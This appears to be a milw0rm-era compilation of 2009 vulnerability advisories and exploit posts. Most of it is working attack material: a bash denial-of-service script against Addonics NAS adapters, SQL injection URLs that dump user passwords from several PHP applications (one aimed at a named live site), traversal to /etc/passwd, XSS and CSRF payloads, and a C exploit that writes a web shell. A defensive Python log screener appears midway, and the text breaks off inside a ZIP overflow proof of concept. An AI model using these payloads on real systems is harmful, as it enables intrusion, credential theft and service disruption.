Foxit Reader JBIG2 Symbol Dictionary Processing Vulnerability

Secunia Research 09/03/2009

- Foxit Reader JBIG2 Symbol Dictionary Processing Vulnerability -


Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

1) Affected Software

* Foxit Reader version 3.0.2009.1301

NOTE: Prior versions may also be affected.

2) Severity

Rating: Highly critical
Impact: System access
Where: Remote

3) Vendor's Description of Software

"As a small and fast PDF viewer, Foxit Reader currently has over 50
million users all around the world. After keeping users waiting for
almost two months, Foxit Reader 3.0 has been released and introduces
many fascinating new features such as multimedia design and Foxit
OnDemand Content Management."

Product Link:
http://www.foxitsoftware.com/pdf/rd_intro.php

4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Foxit Reader, which
can be exploited by malicious people to potentially compromise a
user's system.

The vulnerability is caused by an error when processing JBIG2
symbol dictionary segments. This can be exploited to dereference
uninitialised memory via a specially crafted PDF file.

Successful exploitation may allow execution of arbitrary code.

5) Solution

Update to version 3.0 Build 1506 or version 2.3 Build 3902.

6) Time Table

27/02/2009 - Vendor notified.
28/02/2009 - Vendor response.
09/03/2009 - Public disclosure.

7) Credits

Discovered by Alin Rad Pop, Secunia Research.

8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2009-0191 for the vulnerability.

9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to help improve the
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-11/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

Addonics NAS Adapter Post-Auth Denial of Service Exploit

#!/bin/bash
######################################################
# Addonics NAS Adapter Post-Auth DoS
# Tested against R3282-1.33c LOADER32 1.15, and NASU2FW41 Loader 1.17
# Coded by Mike Cyr, aka h00die
# mcyr2 at csc dot_____________com
# Notes: Any of these BoF crashes the entire stack from the web GUI
# so throw a GET, and bye bye baby!
# Greetz to muts and loganWHD, I tried harder
# http://www.offensive-security.com/offsec101.php turning script kiddies into ninjas daily
# Log: Vendor notification feb 9, 2009 for BoF in R3282-1.33c LOADER32 1.15 firmware
# March 8, 2009: Second vendor notification for BoF in NASU2FW41 Loader 1.17 firmware
# March 9, 2009: Code release on Milw0rm, Bid sent.
######################################################

echo "Addonics NAS Adapter Post-Auth DoS"
echo "Written by H00die"

echo "------------------------"
echo "Addonics IP:"
read -e IP
echo "Addonics GUI Username:"
read -e USERNAME
echo "Addonics GUI Password:"
read -e PASSWORD

echo "-----------------------"
echo "Select Buffer:"
echo "1. FTP: Username (R3282-1.33c LOADER32 1.15)"
echo "2. FTP: Password (R3282-1.33c LOADER32 1.15)"
echo "3. SMB: Username (R3282-1.33c LOADER32 1.15)"
echo "4. SMB: Password (R3282-1.33c LOADER32 1.15, NASU2FW41 Loader 1.17)"
echo "5. FTP: Username (NASU2FW41 Loader 1.17)"
echo "6. FTP: Password (NASU2FW41 Loader 1.17)"
echo "7. SMB: Username (NASU2FW41 Loader 1.17)"

read -e BOF

echo ""
echo "-----------------------"
echo "Sending Malicious GET request"
case "$BOF" in
'1')
wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&Account_passwd=a&ftp_att=W;"
;;
'2')
wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=a&Account_passwd=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&ftp_att=W;"
;;
'3')
wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=smb.htm&failure=fail.htm&type=smb_acct&action=smb_new&acct=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&data1=test&data2=0;"
;;
'4')
wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=smb.htm&failure=fail.htm&type=smb_acct&action=smb_new&acct=a&data1=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&data2=0;"
;;
'5')
wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&Account_passwd=a&ftp_att=W;"
;;
'6')
wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=a&Account_passwd=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&ftp_att=W;"
;;
'7')
wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=smb.htm&failure=fail.htm&type=smb_acct&action=smb_new&acct=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&data1=test&data2=0;"
;;
esac

echo "Stack Smashed..."

# milw0rm

PHP-Fusion Mod Book Panel (bookid) SQL Injection Vulnerability

PHP-Fusion Mod - Book Panel Remote SQL Injection Vulnerability

Author: elusiven from Poland
Contact: elusivenpl@gmail.com
Greetings: Fusi0n Group

Exploit:
http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_name,4,5,6+from+fusion_users--
http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_password,4,5,6+from+fusion_users--

# milw0rm

phpCommunity 2.1.8 (SQL/DT/XSS) Multiple Vulnerabilities

Application: phpCommunity 2
Version: 2.1.8
Website: http://sourceforge.net/projects/phpcommunity2/

Bugs: [A] Multiple SQL Injection
[B] Directory Traversal
[C] Reflected XSS

Exploitation: Remote

Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com

Menu

1) Bugs
2) Code
3) Fix

Bugs

This web application has several vulnerabilities
which can be exploited to obtain restricted information.
The following are examples of vulnerabilities
discovered in this application.


- [A] Multiple SQL Injection

Requisites: magic_quotes_gpc = off
File affected: module/forum/class_forum.php
module/forum/class_search.php

This bug allows a guest to view username and
password of a registered user.


- [B] Directory Traversal

Requisites: none
File affected: module/admin/files/show_file.php,
module/admin/files/show_source.php

This bug allows a guest to read arbitrary files and
directories on the web server.


- [C] Reflected XSS

Requisites: none
File affected: templates/1/login.php

Code


- [A] Multiple SQL Injection

http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=1&forum_id=-1' UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=2&forum_id=0&topic_id=-1' UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=id&wert=-1%25" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=nick&wert=-1%25" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25" UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23


- [B] Directory Traversal

http://www.site.com/path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd

http://www.site.com/path/module/admin/files/show_source.php?path=/etc


- [C] Reflected XSS

http://www.site.com/path/templates/1/login.php?msg=<script>alert('XSS');</script>

Fix

No fix.

# milw0rm

CS-Cart 2.0.0 Beta 3 (product_id) SQL Injection Vulnerability

CS-Cart 2.0.0 Beta 3 (dispatch) SQL Injection Vulnerability
Provider: www.cs-cart.com
Discovered by netsoul
Greetz: m1cr0n, IvanKalet, blackfalcon, str0ke
Contact: netsoul2[at]gmail.com
ALTO PARANA - PARAGUAY
Ñane mba'e teete

Exploit:

http://cs-cart cms/[path]/index.php?dispatch=products.view&product_id=289' UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,concat(user_login,0x3a,password),0,0 from cscart_users/*

# milw0rm

Woltlab Burning Board 3.0.x Multiple Remote Vulnerabilities

Woltlab Burning Board 3.0.x Multiple Remote Vulnerabilities

by Juri Gianni aka yeat - staker[at]hotmail[dot]it
thanks to s3rg3770

Vulnerabilities: BBCode IMG / XSS / Delete PM / Full Path Disclosure / URL Redirection

BBCode IMG Tag Script Injection
[img]http://[host][/img]

Delete Private Messages (BBCode IMG Tag Script Injection)

Insert the code below into a forum message, a private message or your signature:
[img]http://[host]/[path]/wbb/index.php?page=PM&action=delete&pmID=[ID]&folderID=0[/img]
The fake image doesn't show errors.

Cross Site Scripting

http://[host]/[path]/wcf/acp/dereferrer.php?url=javascript:alert("Example");
You can bypass magic_quotes_gpc with the String.fromCharCode function.


URL Redirection

http://[host]/[path]/wcf/acp/dereferrer.php?url=http://[host]
http://[host]/[path]/wbb/?page=ThreadAction&action=deleteAll&boardID=1&url=[local URL]

Full Path Disclosure

http://[host]/[path]/wbb/index.php?page=[]
This works on versions below 3.0.8 only.

# milw0rm

PHPRecipeBook 2.24 (base_id) Remote SQL Injection Vulnerability

PHPRecipeBook 2.24 (base_id) Remote SQL Injection Vulnerability

Discovered By d3b4g
script: http://phprecipebook.sourceforge.net/demo/phprecipebook/
Greetz : str0ke | Inerd | & friends
Follow me on twitter www.twitter.com/schaba


About:

PHPRecipeBook is a Web-based cookbook with the
ability to create shopping lists from recipes selected.
The lists can be saved and later reloaded and edited.
The shopping list also attempts to combine similar items
so that duplication does not occur.



/* start

0x1

Proof of concept
-------------------------------------

Exploit: http://localhost.com/[path]/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--

Demo 1: http://phprecipebook.sourceforge.net/demo/phprecipebook/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--

Demo 2: http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--


/* end

From the tiny little island of the Maldives

# milw0rm

PHP Director <= 0.21 (sql into outfile) eval() Injection Exploit

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Dork "Powered by PHP Director 0.2"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| PHP Director 0.2.1 (sql into outfile) eval() Injection Exploit |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

{Exploit}-> index.php?cat=%27+UNION+SELECT+1,'lol',3,4,5,6,7,8,9,10,11,12,13,14,15+INTO+OUTFILE+'/var/www/ex.php'/*
{PHP.ini}-> Magic Quotes off
{Written}-> by Juri Gianni aka yeat - staker[at]hotmail[dot]it
{WhereIs}-> http://sourceforge.net/projects/phpdirector/
{Compile}-> gcc -o exploit exploit.c


{Details}-> index.php (line 56-58)

56. }elseif (isset($_GET["cat"])) {
57. $cat = $_GET["cat"];
58. $_query = sprintf("SELECT SQL_CALC_FOUND_ROWS * FROM pp_files WHERE `category` = '$cat etc..)

{Bug}-> $cat variable is not checked so we have a sql injection
{Fix}-> $cat = mysql_real_escape_string($_GET['cat']);



yeat@lulz:~/Desktop$ gcc -o exploit exploit.c
yeat@lulz:~/Desktop$ ./exploit localhost /cms /var/www/shell.php
Exploit successful..shell: /var/www/shell.php

*/



#define GET "GET %s/index.php?cat=%s HTTP/1.1\r\n" \
"Host: %s\r\n" \
"User-Agent: Links (2.1pre26; Linux 2.6.19-gentoo-r5 x86_64; x)\r\n" \
"Connection: close\r\n\r\n"

#define Exec "'+UNION+SELECT+1,2,3,4,''"\
",6,7,8,9,10,11,12,13,14,15+INTO+OUTFILE+'%s'"


/* resolve a hostname to its first IPv4 address in dotted form */
char *getHost (char *host)
{
    struct hostent *hp;
    struct in_addr **y;

    hp = gethostbyname(host);
    if (hp == NULL || hp->h_addr_list[0] == NULL) {
        printf("cannot resolve host %s\n",host);
        exit(1);
    }
    y = (struct in_addr **)hp->h_addr_list;

    return inet_ntoa(**y);
}


int main (int argc,char **argv)
{
    int server,leak,n;
    char html[1024];
    char packet[500],loadsf[500];

    struct sockaddr_in addr;

    /* host, path and output file are all required (argv[3] is used below) */
    if (argc < 4) {
        printf("Usage: %s host path file\n",argv[0]);
        printf("RunEx: %s localhost /cms /var/www/shell.php\n",argv[0]);
        exit(0);
    }

    server = socket(AF_INET,SOCK_STREAM,0);
    if (server < 0) {
        perror("socket");
        exit(1);
    }

    memset(&addr,0,sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(80);
    addr.sin_addr.s_addr = inet_addr(getHost(argv[1]));

    leak = connect(server,(struct sockaddr*)&addr,sizeof(addr));

    if (leak < 0) {
        printf("connection refused..try again\n");
        exit(0);
    }

    /* build the query string, then append the url-encoded '#' comment marker
       without overrunning the buffer */
    snprintf(loadsf,sizeof(loadsf),Exec,argv[3]);
    strncat(loadsf,"%23",sizeof(loadsf)-strlen(loadsf)-1);
    snprintf(packet,sizeof(packet),GET,argv[2],loadsf,argv[1]);

    /* send only the bytes actually written, not the whole buffer */
    if (send(server,packet,strlen(packet),0) < 0) {
        printf("data sent error..\n");
    }

    /* null-terminate the received chunk before searching it */
    while((n = recv(server,html,sizeof(html)-1,0)) > 0)
    {
        html[n] = '\0';
        if (strstr(html,"MySQL") || strstr(html,"mysql_fetch_array")) {
            printf("Exploit unsuccessful..\n"); break;
        }
        else {
            printf("Exploit successful..shell: %s\n",argv[3]); break;
        }
    }

    close(server);
    return 0;
}

#milw0rm
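As an added, defender-side example (not code from any advisory on this page): a small screener that runs over constructed web-server access-log lines and flags the request shapes the advisories above describe: the oversized nas.cgi fields from the Addonics script, the UNION SELECT / INTO OUTFILE strings aimed at parameters such as cat, bookid, product_id and forum_id, the show_file.php traversal, and the reflected script in login.php. The combined log format, the TEST-NET client addresses and the 128-byte field-length threshold are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" access-log shape (assumed); only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The nas.cgi fields the Addonics script above overflows, and a length beyond which a
# legitimate account name or password is implausible (128 is an assumed threshold).
ADDONICS_FIELDS = {"Account", "Account_passwd", "acct", "data1"}
MAX_FIELD_LEN = 128

# Markers taken from the injection strings on this page: UNION [ALL] SELECT and INTO OUTFILE,
# a ../ or ..\ hop for the show_file.php traversal, and <script / javascript: for the XSS cases.
SQLI_RE = re.compile(r"union\s+(?:all\s+)?select|into\s+outfile", re.I)
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
XSS_RE = re.compile(r"<\s*script|javascript:", re.I)


def decode_params(target):
    """Split a request target into its path and the percent-decoded (name, value) pairs."""
    parts = urlsplit(target)
    # parse_qsl decodes %xx and '+', so 'cat=%27+UNION' becomes ("cat", "' UNION");
    # blank values are kept so bare parameter names still show up.
    return parts.path, parse_qsl(parts.query, keep_blank_values=True)


def screen_target(target):
    """Return a list of 'check:parameter' findings for one request target (empty if clean)."""
    path, params = decode_params(target)
    findings = []
    for name, value in params:
        if path.endswith("/nas.cgi") and name in ADDONICS_FIELDS and len(value) > MAX_FIELD_LEN:
            findings.append(f"oversized_field:{name}")
        if SQLI_RE.search(value):
            findings.append(f"sqli:{name}")
        if TRAVERSAL_RE.search(value):
            findings.append(f"traversal:{name}")
        if XSS_RE.search(value):
            findings.append(f"xss:{name}")
    return findings


def screen_log(lines):
    """Return (client ip, target, findings) for every parseable line with at least one finding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:  # lines that are not in the expected format are skipped, not fatal
            continue
        findings = screen_target(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("target"), findings))
    return hits


# Constructed sample lines (TEST-NET addresses, made-up timestamps) shaped like the requests
# the advisories above describe; none of these were captured from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Mar/2009:10:00:01 +0000] "GET /cms/index.php?cat=3 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [09/Mar/2009:10:00:02 +0000] "GET /cms/index.php?cat=%27+UNION+SELECT+1,%27lol%27,3'
    '+INTO+OUTFILE+%27/var/www/ex.php%27/* HTTP/1.1" 200 812',
    '203.0.113.9 - - [09/Mar/2009:10:00:03 +0000] "GET /nas.cgi?redirect=ftp.htm&type=ftps_user_add'
    '&Account=' + "a" * 300 + '&Account_passwd=a&ftp_att=W HTTP/1.1" 500 0',
    '203.0.113.11 - - [09/Mar/2009:10:00:04 +0000] "GET /path/module/admin/files/show_file.php'
    '?file=../../../../../../../../etc/passwd HTTP/1.1" 200 1950',
    '203.0.113.13 - - [09/Mar/2009:10:00:05 +0000] "GET /path/templates/1/login.php'
    '?msg=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1" 200 2301',
    'not an access-log line at all',
]

if __name__ == "__main__":
    for ip, target, findings in screen_log(SAMPLE_LOG):
        print(f"{ip}  {', '.join(findings)}  {target[:60]}")
```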

eZip Wizard 3.0 Local Stack Buffer Overflow PoC (SEH)

ezip wizard Local Stack Buffer Overflow (SEH) POC
SEH chain of main thread
Address SE handler
0012FC60 58585858
0012FC60 41414141 AAAA Pointer to next SEH record

Old bug, still not fixed by vendors; this kind of file causes problems for a lot of software of this kind.
Ex: ZipGenius stack buffer overflow (SEH overwrite)
zip it fast format string buffer overflow
Power zip 7.2 stack buffer overflow
and so on..

/* header names were lost in extraction; the standard ones a file-writing PoC needs are assumed */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>



char file[] =
{
0x50, 0x4B, 0x03, 0x04, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB7, 0xAC, 0xCE, 0x34, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x08, 0x00, 0x00, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x66, 0x66, 0x64, 0x73, 0x75, 0x69, 0x62, 0x7A, 0x65, 0x6F, 0x69, 0x76, 0x7A, 0x20, 0x66, 0x68,
0x65, 0x6F, 0x20, 0x79, 0x66, 0x6F, 0x7A, 0x69, 0x61, 0x71, 0x20, 0x6F, 0x69, 0x65, 0x61, 0x7A,
0x75, 0x20, 0x7A, 0x71, 0x6F, 0x66, 0x68, 0x75, 0x65, 0x7A, 0x71, 0x6F, 0x69, 0x65, 0x6E, 0x66,
0x65, 0x7A, 0x6A, 0x75, 0x71, 0x63, 0x62, 0x75, 0x71, 0x70, 0x7A, 0x61, 0x7A, 0x69, 0x27, 0x74,
0x75, 0x72, 0x65, 0x6F, 0x7A, 0x6E, 0x62, 0x69, 0x6A, 0x75, 0x76, 0x62, 0x67, 0x73, 0x64, 0x75,
0x69, 0x71, 0x79, 0x72, 0x7A, 0x61, 0x6A, 0x20, 0x62, 0x63, 0x73, 0x64, 0x6F, 0x70, 0x69, 0x75,
0x72, 0x79, 0x7A, 0x6F, 0x65, 0x61, 0x71, 0x6E, 0x62, 0x69, 0x6F, 0x64, 0x73, 0x79, 0x72, 0x66,
0x65, 0x7A, 0x71, 0x6F, 0x69, 0x70, 0x62, 0x75, 0x66, 0x63, 0x73, 0x71, 0x69, 0x75, 0x79, 0x72,
0x61, 0x7A, 0x62, 0x69, 0x6A, 0x65, 0x66, 0x62, 0x68, 0x73, 0x75, 0x69, 0x71, 0x76, 0x64, 0x73,
0x71, 0x69, 0x6A, 0x62, 0x66, 0x65, 0x7A, 0x71, 0x75, 0x61, 0x66, 0x64, 0x64, 0x64, 0x64, 0x64,
0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x68, 0x68,
0x68, 0x68, 0x68, 0x68, 0x68, 0x68, 0x68, 0x68, 0x68, 0x68, 0x68, 0x68, 0x68, 0x75, 0x75, 0x75,
0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x68, 0x76, 0x71, 0x24, 0x69, 0x66, 0x72, 0x7A,
0x65, 0x6F, 0x62, 0x76, 0x69, 0x6F, 0x7A, 0x65, 0x71, 0x66, 0x74, 0x72, 0x65, 0x6F, 0x7A, 0x71,
0x6A, 0x6E, 0x62, 0x76, 0x64, 0x73, 0x70, 0x69, 0x79, 0x75, 0x66, 0x71, 0x6F, 0x65, 0x69, 0x68,
0x66, 0x72, 0x6F, 0x75, 0x65, 0x7A, 0x68, 0x61, 0x72, 0x62, 0x20, 0x69, 0x76, 0x66, 0x64, 0x73,
0x70, 0x6F, 0x68, 0x6A, 0x72, 0x65, 0x71, 0x6F, 0x75, 0x68, 0x66, 0x7A, 0x65, 0x61, 0x71, 0x75,
0x68, 0x76, 0x71, 0x6F, 0x75, 0x68, 0x65, 0x66, 0x6F, 0x71, 0x73, 0x69, 0x6A, 0x68, 0x64, 0x6F,
0x73, 0x71, 0x68, 0x76, 0x64, 0x6F, 0x69, 0x68, 0x7A, 0x61, 0x71, 0x6F, 0x65, 0x69, 0x68, 0x66,
0x64, 0x73, 0x6F, 0x69, 0x75, 0x68, 0x76, 0x63, 0x78, 0x77, 0x69, 0x75, 0x68, 0x66, 0x71, 0x6F,
0x75, 0x69, 0x68, 0x76, 0x77, 0x78, 0x6F, 0x69, 0x68, 0x66, 0x64, 0x73, 0x71, 0x6F, 0x69, 0x68,
